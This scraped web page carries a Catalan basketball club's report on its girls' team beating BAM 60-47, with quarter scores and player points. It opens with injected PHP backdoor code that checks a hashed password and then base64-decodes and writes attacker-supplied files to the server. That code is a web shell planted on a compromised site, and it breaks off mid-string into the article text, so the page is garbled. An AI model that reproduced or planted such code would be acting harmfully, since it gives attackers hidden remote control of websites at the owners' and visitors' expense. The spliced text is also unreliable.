function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil Fem 10A supera al BAM (60-47) - Tgn Bàsquet Club -

L’Infantil Fem 10A supera al BAM (60-47)

Updated: febrer 23, 2024

Molt bona victòria de l’Infantil Preferent del TGN Bàsquet contra el BAM.

El partit va començar amb molts desencerts per part dels dos equips, així doncs, s’arribava al final del primer quart amb un marcador de 7-7, en el segon quart el TGN va pujar l’intensitat defensiva i va aconseguir marxar en el marcador. En la segona part el partit es va tornar a ajustar però el TGN gràcies a una bona defensa i a controlar bé el rebot defensiu va aconseguir emportar-se la victòria. Enhorabina LILES!

TGN BÀSQUET 10A60  –   BAM – BLAU – PORTECA: 47

PARCIALS: 7-7, 23-15, 21-15, 15-6

TGN BÀSQUET 10A: Valls (6), Porta (10), Martin (2) Carles (4) i Parera (11) —cinc inicial— Ramón (7), Romeu (6), Bueso (2), Sentis (6) i Domínguez (6).

LES XIFRES DEL PARTIT: 5/7 tirs lliures | 18 faltes

BAM – BLAU – PORTECAComes (-), Pomares (8), Ugarriza (4), Font (2) i Salvadó (6)—cinc inicial— Jordana (3), Riudavets (-), Cabrelles (11), Torrents (3) i Botter (10).

LES XIFRES DEL PARTIT: 5/14 tirs lliures | 14 faltes